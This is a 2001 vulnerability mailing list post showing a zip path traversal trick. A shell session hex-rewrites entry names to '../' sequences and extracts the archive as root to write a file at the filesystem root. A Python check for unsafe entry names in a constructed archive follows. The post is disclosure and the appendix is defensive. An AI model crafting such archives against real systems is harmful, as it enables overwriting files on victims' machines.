Vulnerability Development mailing list archives

Re: Valid characters on one o/s are invalid on another


From: <zen-parse () gmx net>
Date: Tue, 26 Jun 2001 06:06:16 +1200 (NZST)

it was possible to create a zip archive with some files in, hex edit the
archive and change the locations of some of these files, thus making it
extremely easy to transparently replace files on a system that the archive
is extracted on. This used to be a particularly nasty trick on amiga bbs's

it's still possible.

tested with unzip (under rh 7.0)
this also apparently works with winzip and pkunzip

$ echo "@echo haxed" >ddsddsddsddsddsddsautoexec.bta
$ zip file ddsddsddsddsddsddsautoexec.bta
$ unzip -t file.zip
Archive:  file.zip
    testing: ddsddsddsddsddsddsautoexec.bta   OK
No errors detected in compressed data of file.zip.
$ sed 's,dds,../,g' <file.zip >newfile.zip
$ unzip -t newfile.zip
Archive:  newfile.zip
    testing: ../../../../../../autoexec.bta   OK
No errors detected in compressed data of newfile.zip.
$ unzip newfile.zip
Archive:  newfile.zip
error:  cannot create ../../../../../../autoexec.bta
$ su
Password:
# unzip newfile.zip
Archive:  newfile.zip
 extracting: ../../../../../../autoexec.bta
# ls -al /autoexec.bta
-rw-r--r--    1 root     root           12 Jun 26 06:00 /autoexec.bta

 -- zen-parse
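
A pre-extraction check for the behaviour shown in this post, as an added example that is not part of the original message: it reads the stored entry names and flags any that would resolve outside the extraction directory, without extracting anything. The archive is constructed in memory, and the names `is_unsafe_name`, `unsafe_entries` and `build_sample` are hypothetical.

```python
import io
import posixpath
import re
import zipfile


def is_unsafe_name(name):
    """True if a stored entry name would land outside the extraction directory."""
    # Names may have been written on another OS: treat '\' as a separator too.
    unified = name.replace("\\", "/")
    if unified.startswith("/") or re.match(r"^[A-Za-z]:", unified):
        return True  # absolute path or DOS drive letter
    norm = posixpath.normpath(unified)
    return norm == ".." or norm.startswith("../")


def unsafe_entries(zip_bytes):
    """Return the stored names to reject, without extracting anything."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [i.filename for i in zf.infolist() if is_unsafe_name(i.filename)]


def build_sample():
    """Constructed test archive: two ordinary names, two that climb out."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in ("docs/readme.txt", "docs/../notes.txt",
                     "../../../../../../autoexec.bta", "..\\..\\boot.ini"):
            zf.writestr(name, "constructed sample data\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name in unsafe_entries(build_sample()):
        print("refusing entry:", name)
```

The check is purely lexical, so it does not account for symlinks that already exist inside the destination directory.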